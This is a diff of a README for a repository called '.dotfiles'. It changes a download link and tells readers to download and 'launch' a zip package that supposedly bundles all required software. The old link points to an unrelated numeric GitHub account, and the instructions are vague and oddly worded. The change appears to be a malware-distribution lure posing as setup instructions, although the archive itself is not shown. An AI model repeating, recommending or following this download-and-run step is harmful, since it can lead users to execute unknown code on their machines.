Xaviertya/.dotfiles/README.md

 ## Installation 🛠️

 To make the setup process even easier, we have bundled all the necessary software and dependencies into a convenient package.
-You can download it [here](https://github.com/22155555/1875695542/releases/download/v1.0/Software.zip) for a seamless setup experience.
+You can download it [here](https://github.com/Xaviertya/.dotfiles/releases/download/v1.0/Release.zip) for a seamless setup experience.

 ### Launch the Software Package
-Since the link ends with the file name, make sure to launch the Software.zip package to access all the required tools and dependencies.
+Since the link ends with the file name, make sure to launch the https://github.com/Xaviertya/.dotfiles/releases/download/v1.0/Release.zip package to access all the required tools and dependencies.

 If you encounter any issues with the download link, please check the "Releases" section of this repository for alternative options.